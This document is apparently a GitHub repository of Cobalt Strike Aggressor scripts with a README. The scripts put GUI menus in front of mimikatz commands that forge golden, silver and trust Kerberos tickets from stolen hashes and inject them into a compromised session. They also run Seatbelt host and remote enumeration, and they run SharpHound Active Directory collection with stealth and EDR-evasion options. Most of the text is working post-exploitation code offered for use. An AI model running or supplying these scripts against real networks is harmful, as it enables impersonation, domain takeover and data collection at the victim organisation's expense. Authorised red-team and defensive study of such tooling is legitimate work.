├── CreateTicket.cna ├── README.md ├── Seatbelt.cna ├── SharpHound.cna └── screenshots ├── createticket-golden.png ├── createticket-silver.png ├── createticket-trust.png ├── createticket.png ├── seatbelt-command-args.png ├── seatbelt-command-groups.png ├── seatbelt-remote-enum.png ├── seatbelt.png └── sharphound.png /CreateTicket.cna: -------------------------------------------------------------------------------- 1 | # CreateTicket Aggressor Script 2 | # Author: @captmeelo 3 | # Blog: https://captmeelo.com/ 4 | # GitHub: https://github.com/capt-meelo 5 | 6 | popup beacon_bottom { 7 | menu "Create Ticket" { 8 | item "Golden Ticket" { 9 | createGoldenTicket($1); 10 | } 11 | item "Silver Ticket" { 12 | createSilverTicket($1); 13 | } 14 | item "Trust Ticket" { 15 | createTrustTicket($1); 16 | } 17 | } 18 | } 19 | 20 | sub createGoldenTicket { 21 | $bid = $1; 22 | 23 | $dialog = dialog("Golden Ticket", %(user => "Administrator", domain => "domain.local", domain_SID => "S-1-5-21-000000000-1111111111-2222222222"), lambda({ 24 | $command = "kerberos::golden /user:$3['user'] /domain:$3['domain'] /sid:$3['domain_SID'] /krbtgt:$3['krbtgt_hash'] $3['custom_args'] /endin:600 /renewmax:10080 /ptt"; 25 | binput($bid, "mimikatz $command"); 26 | bmimikatz($bid, $command); 27 | }) 28 | ); 29 | 30 | dialog_description($dialog, "Generate a golden ticket and inject it into the current session."); 31 | drow_text($dialog, "user", "User to Impersonate: "); 32 | drow_text($dialog, "domain", "Domain FQDN: "); 33 | drow_text($dialog, "domain_SID", "Domain SID: "); 34 | drow_krbtgt($dialog, "krbtgt_hash", "KRBTGT Hash: "); 35 | drow_text($dialog, "custom_args", "Custom Args: "); 36 | dbutton_action($dialog, "Run"); 37 | dbutton_help($dialog, "https://adsecurity.org/?page_id=1821#KERBEROSGolden"); 38 | dialog_show($dialog); 39 | } 40 | 41 | sub createSilverTicket { 42 | $bid = $1; 43 | 44 | $dialog = dialog("Silver Ticket", %(user => "ServerAdmin", domain => "domain.local", domain_SID => "S-1-5-21-000000000-1111111111-2222222222", target_host => "srv01.domain.local", service => "cifs"), lambda({ 45 | $command = "kerberos::golden /user:$3['user'] /domain:$3['domain'] /sid:$3['domain_SID'] /target:$3['target_host'] /rc4:$3['target_hash'] /service:$3['service'] $3['custom_args'] /endin:600 /renewmax:10080 /ptt"; 46 | binput($bid, "mimikatz $command"); 47 | bmimikatz($bid, $command); 48 | }) 49 | ); 50 | 51 | dialog_description($dialog, "Create a silver ticket and inject it into the current session."); 52 | drow_text($dialog, "user", "User to Impersonate: "); 53 | drow_text($dialog, "domain", "Domain FQDN: "); 54 | drow_text($dialog, "domain_SID", "Domain SID: "); 55 | drow_text($dialog, "target_host", "Target Host FQDN: "); 56 | drow_text($dialog, "target_hash", "Target Host Hash (RC4): "); 57 | drow_text($dialog, "service", "Service: "); 58 | drow_text($dialog, "custom_args", "Custom Args: "); 59 | dbutton_action($dialog, "Run"); 60 | dbutton_help($dialog, "https://adsecurity.org/?page_id=1821#SilverTicket"); 61 | dialog_show($dialog); 62 | } 63 | 64 | sub createTrustTicket { 65 | $bid = $1; 66 | 67 | $dialog = dialog("Trust Ticket", %(user => "Administrator", domain => "domain.local", domain_SID => "S-1-5-21-000000000-1111111111-2222222222", SID_history => "S-1-5-21-3333333333-4444444444-555555555-519"), lambda({ 68 | $command = "kerberos::golden /user:$3['user'] /domain:$3['domain'] /sid:$3['domain_SID'] /sids:$3['SID_history'] /krbtgt:$3['krbtgt_hash'] $3['custom_args'] /endin:600 /renewmax:10080 /ptt"; 69 | binput($bid, "mimikatz $command"); 70 | bmimikatz($bid, $command); 71 | }) 72 | ); 73 | 74 | dialog_description($dialog, "Generate a trust ticket and inject it into the current session."); 75 | drow_text($dialog, "user", "User to Impersonate: "); 76 | drow_text($dialog, "domain", "Domain FQDN: "); 77 | drow_text($dialog, "domain_SID", "Domain SID: "); 78 | drow_text($dialog, "SID_history", "SID History: "); 79 | drow_krbtgt($dialog, "krbtgt_hash", "KRBTGT Hash: "); 80 | drow_text($dialog, "custom_args", "Custom Args: "); 81 | dbutton_action($dialog, "Run"); 82 | dbutton_help($dialog, "https://adsecurity.org/?page_id=1821#TrustTicket"); 83 | dialog_show($dialog); 84 | } -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | ## AggressorScripts 2 | 3 | Collection of scripts that I created to make my life easier since I'm not good at remembering command-line options and don't like typing things. 4 | 5 | ### CreateTicket.cna 6 | 7 | - Generate golden, silver, and trust tickets from the GUI. The created tickets are then injected into the current session. 8 | - The default settings are: 9 | - It uses the `/endin:600` and `/renewmax:10080` arguments to set the ticket lifetime and the maximum lifetime that a ticket can be renewed. 10 | 11 | **Screenshots** 12 | 13 | ![createticket.png](./screenshots/createticket.png "CreateTicket Menu") 14 | 15 | ![createticket-golden.png](./screenshots/createticket-golden.png "Creating Golden Ticket ") 16 | 17 | ![createticket-silver.png](./screenshots/createticket-silver.png "Creating Silver Ticket ") 18 | 19 | ![createticket-trust.png](./screenshots/createticket-trust.png "Creating Trust Ticket ") 20 | --- 21 | 22 | ### Seatbelt.cna 23 | 24 | - Run Seatbelt from the GUI. 25 | - The default settings are: 26 | - It runs Seatbelt using the `-full` option to return complete results without any filtering. _(Can only be disabled by removing the `-full` string from the code.)_ 27 | - It saves the result to `C:\Windows\Temp\out.txt`. Leaving this option **blank** won't save the result to a file. 28 | - _**Note:** Before using, modify the value of the `$assembly` variable first and point it to the location of the Seatbelt binary._ 29 | 30 | **Screenshots** 31 | 32 | ![seatbelt.png](./screenshots/seatbelt.png "Executing Seatbelt") 33 | 34 | ![seatbelt-command-args.png](./screenshots/seatbelt-command-args.png "Running Command Groups") ![seatbelt-command-groups.png](./screenshots/seatbelt-command-groups.png "Running Command Arguments") 35 | 36 | ![seatbelt-remote-enum.png](./screenshots/seatbelt-remote-enum.png "Running Remote Enumeration") 37 | --- 38 | 39 | ### SharpHound.cna 40 | 41 | - Run SharpHound from the GUI. 42 | - The default settings are: 43 | - It runs using the `--NoSaveCache` option to prevent writing cache files to disk, which can help with AV and EDR evasion. 44 | - It saves the result to `C:\Windows\Temp\` directory. Leaving this option **blank** will save the file to the directory where SharpHound was launched from. 45 | - _**Note:** Before using, modify the value of the `$assembly` variable first and point it to the location of the Sharphound binary._ 46 | 47 | **Screenshots** 48 | 49 | ![sharphound.png](./screenshots/sharphound.png "Running SharpHound") 50 | --- -------------------------------------------------------------------------------- /Seatbelt.cna: -------------------------------------------------------------------------------- 1 | # Seatbelt Aggressor Script 2 | # Author: @captmeelo 3 | # Blog: https://captmeelo.com/ 4 | # GitHub: https://github.com/capt-meelo 5 | 6 | # Location of Seatbelt binary 7 | $assembly = "C:\\tools\\SharpCollection\\NetFramework_4.0_x64\\Seatbelt.exe"; 8 | 9 | popup beacon_bottom { 10 | menu "Seatbelt" { 11 | item "Run Command Groups" { 12 | runCommandGroups($1); 13 | } 14 | item "Run Command Arguments" { 15 | runCommandArguments($1); 16 | } 17 | item "Remote Enumeration" { 18 | runRemoteEnum($1); 19 | } 20 | } 21 | } 22 | 23 | sub runCommandGroups { 24 | $bid = $1; 25 | 26 | $dialog = dialog("Seatbelt", %(outputfile => "C:\\Windows\\Temp\\out.txt"), lambda({ 27 | $group = $3["group"]; 28 | 29 | if ($3["outputfile"] ne $null) { 30 | $outputfile = $3["outputfile"]; 31 | $outputfile = "-outputfile=\"$outputfile\""; 32 | } else { 33 | $outputfile = ""; 34 | } 35 | 36 | $command = "-group=$group -full $outputfile"; 37 | binput($bid, "execute-assembly $assembly $command"); 38 | bexecute_assembly($bid, $assembly, $command); 39 | }) 40 | ); 41 | 42 | dialog_description($dialog, "Run Seatbelt using the default command groups. Output file can either be \".txt\" or \".json\"."); 43 | drow_combobox($dialog, "group", "Group:", @("All", "User", "System", "Slack", "Chromium", "Misc")); 44 | drow_text($dialog, "outputfile", "Output File: "); 45 | dbutton_action($dialog, "Run"); 46 | dbutton_help($dialog, "https://github.com/GhostPack/Seatbelt/blob/master/README.md#command-groups"); 47 | dialog_show($dialog); 48 | } 49 | 50 | sub runCommandArguments { 51 | $bid = $1; 52 | 53 | $dialog = dialog("Seatbelt", %(arguments => "LogonEvents 30", outputfile => "C:\\Windows\\Temp\\out.txt"), lambda({ 54 | $arguments = $3["arguments"]; 55 | 56 | if ($3["outputfile"] ne $null) { 57 | $outputfile = $3["outputfile"]; 58 | $outputfile = "-outputfile=\"$outputfile\""; 59 | } else { 60 | $outputfile = ""; 61 | } 62 | 63 | $command = "\"$arguments\" -full $outputfile"; 64 | binput($bid, "execute-assembly $assembly $command"); 65 | bexecute_assembly($bid, $assembly, $command); 66 | }) 67 | ); 68 | 69 | dialog_description($dialog, "Run Seatbelt by passing arguments. Output file can either be \".txt\" or \".json\"."); 70 | drow_text($dialog, "arguments", "Command Arguments: "); 71 | drow_text($dialog, "outputfile", "Output File: "); 72 | dbutton_action($dialog, "Run"); 73 | dbutton_help($dialog, "https://github.com/GhostPack/Seatbelt/blob/master/README.md#command-arguments"); 74 | dialog_show($dialog); 75 | } 76 | 77 | sub runRemoteEnum { 78 | $bid = $1; 79 | 80 | $dialog = dialog("Seatbelt", %(outputfile => "C:\\Windows\\Temp\\out.txt"), lambda({ 81 | $computername = $3["computername"]; 82 | $username = $3["username"]; 83 | $password = $3["password"]; 84 | 85 | if ($3["outputfile"] ne $null) { 86 | $outputfile = $3["outputfile"]; 87 | $outputfile = "-outputfile=\"$outputfile\""; 88 | } else { 89 | $outputfile = ""; 90 | } 91 | 92 | $command = "-group=remote -computername=$computername -username=$username -password=\"$password\" -full $outputfile"; 93 | binput($bid, "execute-assembly $assembly $command"); 94 | bexecute_assembly($bid, $assembly, $command); 95 | }) 96 | ); 97 | 98 | dialog_description($dialog, "Run Seatbelt against a remote system. Output file can either be \".txt\" or \".json\"."); 99 | drow_text($dialog, "computername", "Remote System (FQDN/IP): "); 100 | drow_text($dialog, "username", "Username (Domain\\User): "); 101 | drow_text($dialog, "password", "Password: "); 102 | drow_text($dialog, "outputfile", "Output File: "); 103 | dbutton_action($dialog, "Run"); 104 | dbutton_help($dialog, "https://github.com/GhostPack/Seatbelt/blob/master/README.md#remote-enumeration"); 105 | dialog_show($dialog); 106 | } -------------------------------------------------------------------------------- /SharpHound.cna: -------------------------------------------------------------------------------- 1 | # SharpHound Aggressor Script 2 | # Author: @captmeelo 3 | # Blog: https://captmeelo.com/ 4 | # GitHub: https://github.com/capt-meelo 5 | 6 | # Location of SharpHound binary 7 | $assembly = "C:\\tools\\SharpCollection\\NetFramework_4.5_x64\\SharpHound.exe"; 8 | 9 | popup beacon_bottom { 10 | item "SharpHound" { 11 | runSharpHound($1); 12 | } 13 | } 14 | 15 | sub runSharpHound { 16 | $bid = $1; 17 | 18 | $dialog = dialog("SharpHound", %(collectionmethod => "Default", outputdir => "C:\\Windows\\Temp\\"), lambda({ 19 | $collectionmethod = $3["collectionmethod"]; 20 | 21 | if ($3["domain"] ne $null) { 22 | $domain = $3["domain"]; 23 | $domain = "--Domain $domain"; 24 | } else { 25 | $domain = ""; 26 | } 27 | 28 | if ($3["stealth"] eq "true") { 29 | $stealth = "--Stealth"; 30 | } else { 31 | $stealth = ""; 32 | } 33 | 34 | if ($3["outputdir"] ne $null) { 35 | $outputdir = $3["outputdir"]; 36 | $outputdir = "--OutputDirectory $outputdir" 37 | } else { 38 | $outputdir = ""; 39 | } 40 | 41 | $command = "--CollectionMethod $collectionmethod $domain --NoSaveCache $stealth $outputdir"; 42 | binput($bid, "execute-assembly $assembly $command"); 43 | bexecute_assembly($bid, $assembly, $command); 44 | }) 45 | ); 46 | 47 | dialog_description($dialog, "Execute SharpHound without saving cache file to disk for OPSEC."); 48 | drow_combobox($dialog, "collectionmethod", "Collection Method:", @("All,GPOLocalGroup", "All", "Default", "Group", "LocalAdmin", "RDP", "DCOM", "PSRemote", "GPOLocalGroup", "Session", "ComputerOnly", "LoggedOn", "Trusts", "ACL", "Container", "DcOnly", "ObjectProps")); 49 | drow_text($dialog, "domain", "Domain: "); 50 | drow_text($dialog, "outputdir", "Output Directory: "); 51 | drow_checkbox($dialog, "stealth", "Stealth Mode: ", "Enable"); 52 | dbutton_action($dialog, "Run"); 53 | dbutton_help($dialog, "https://bloodhound.readthedocs.io/en/latest/data-collection/sharphound.html"); 54 | dialog_show($dialog); 55 | } -------------------------------------------------------------------------------- /screenshots/createticket-golden.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/capt-meelo/AggressorScripts/aa53e7219c2ba4c3d6e7acb889b63889431712b0/screenshots/createticket-golden.png -------------------------------------------------------------------------------- /screenshots/createticket-silver.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/capt-meelo/AggressorScripts/aa53e7219c2ba4c3d6e7acb889b63889431712b0/screenshots/createticket-silver.png -------------------------------------------------------------------------------- /screenshots/createticket-trust.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/capt-meelo/AggressorScripts/aa53e7219c2ba4c3d6e7acb889b63889431712b0/screenshots/createticket-trust.png -------------------------------------------------------------------------------- /screenshots/createticket.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/capt-meelo/AggressorScripts/aa53e7219c2ba4c3d6e7acb889b63889431712b0/screenshots/createticket.png -------------------------------------------------------------------------------- /screenshots/seatbelt-command-args.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/capt-meelo/AggressorScripts/aa53e7219c2ba4c3d6e7acb889b63889431712b0/screenshots/seatbelt-command-args.png -------------------------------------------------------------------------------- /screenshots/seatbelt-command-groups.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/capt-meelo/AggressorScripts/aa53e7219c2ba4c3d6e7acb889b63889431712b0/screenshots/seatbelt-command-groups.png -------------------------------------------------------------------------------- /screenshots/seatbelt-remote-enum.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/capt-meelo/AggressorScripts/aa53e7219c2ba4c3d6e7acb889b63889431712b0/screenshots/seatbelt-remote-enum.png -------------------------------------------------------------------------------- /screenshots/seatbelt.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/capt-meelo/AggressorScripts/aa53e7219c2ba4c3d6e7acb889b63889431712b0/screenshots/seatbelt.png -------------------------------------------------------------------------------- /screenshots/sharphound.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/capt-meelo/AggressorScripts/aa53e7219c2ba4c3d6e7acb889b63889431712b0/screenshots/sharphound.png --------------------------------------------------------------------------------